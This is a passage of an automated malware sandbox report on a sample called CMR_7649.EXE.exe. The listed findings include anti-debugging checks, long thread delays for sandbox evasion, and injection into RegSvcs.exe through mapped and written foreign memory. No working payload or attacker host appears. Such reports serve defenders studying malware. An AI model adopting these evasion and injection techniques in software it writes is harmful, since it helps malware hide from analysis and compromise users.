                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Switches to a custom stack to bypass stack traces
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeAPI/Special instruction interceptor: Address: 3EDF254
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599891Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599766Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599657Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599532Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599422Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599313Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599188Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599063Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598938Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598813Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598703Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598594Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598469Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598115Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597365Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 8265Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 1557Jump to behavior
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-85713
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeAPI coverage: 3.6 %
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599891Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599766Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599657Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599532Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599422Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599313Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599188Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599063Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598938Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598813Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598703Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598594Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598469Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598115Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597365Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593985Jump to behavior
                  Source: RegSvcs.exe, 00000001.00000002.4109713154.0000000001466000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeAPI call chain: ExitProcess graph end nodegraph_0-84839
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_0045A370 BlockInput,0_2_0045A370
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_03EDF520 mov eax, dword ptr fs:[00000030h]0_2_03EDF520
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_03EDF4C0 mov eax, dword ptr fs:[00000030h]0_2_03EDF4C0
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_03EDDE80 mov eax, dword ptr fs:[00000030h]0_2_03EDDE80
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_004238DA
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_0041F250 SetUnhandledExceptionFilter,0_2_0041F250
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041A208
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00417DAA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Maps a DLL or memory area into another process
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                  Writes to foreign memory regions
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: F08008Jump to behavior
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_00436CD7 LogonUserW,0_2_00436CD7
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event,0_2_0043333C
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\CMR_7649.EXE.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00446124
                  Source: CMR_7649.EXE.exeBinary or memory string: Shell_TrayWnd
                  Source: CMR_7649.EXE.exeBinary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
